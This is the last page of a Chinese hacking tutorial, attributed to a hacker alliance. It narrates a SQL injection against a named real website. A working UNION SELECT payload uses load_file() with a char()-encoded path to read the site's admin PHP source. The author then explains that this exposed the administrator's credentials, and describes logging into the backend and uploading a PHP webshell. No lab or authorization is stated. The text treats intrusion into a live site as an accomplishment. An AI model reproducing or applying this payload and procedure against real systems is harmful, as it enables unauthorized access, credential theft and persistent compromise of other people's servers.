构造的语句如下，load_file(char(文件路径的ascii值，用逗号隔开))也可以用十六进制!我们这里把它插入到5

　　http://zh.ouou.com/booklook.php?id=28%20and%201=2%20union%20select%201,2,3,4,load_file(char(47,100,97,116,97,47,119,101,98,114,111,111,116,47,122,104,47,97,100,109,105,110,47,105,110,100,101,120, 46,112,104,112)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*

　　什么都没有???太不给面子了吧?不可能啊，查看源代码看看，是不是没有显示出来呢?(这是为什么呢?我都变态了哈)

　　看来代码确实是爆出来了，呵呵，只是没有在页面里显示，不过也没什么，无所谓的事，那我们就爆一个查看一下源代码就有喽，黑客是不可以偷懒的哦(这是为什么呢?)，逐个爆，看看INC.PHP的代码，不爆不知道，一爆吓一跳，原来管理员的登录验证都是在这个文件里，怪不得表里找不到!

　　哦了，知道了后台的账户和密码，下面就登录它后台吧!

　　看了一下后台，找了一个地方传个PHP的WEBSHELL，呵呵～!

　　结尾：就到这了，我想我写大家应该都能看得懂吧?如果有不明白的地方欢迎来我的博客做技术交流!本人博客地址是http://www.337479.cn。

版权声明：转载请注明来自于“华夏黑客同盟”，否则将追究法律责任。

上一页  [1] [2] [3]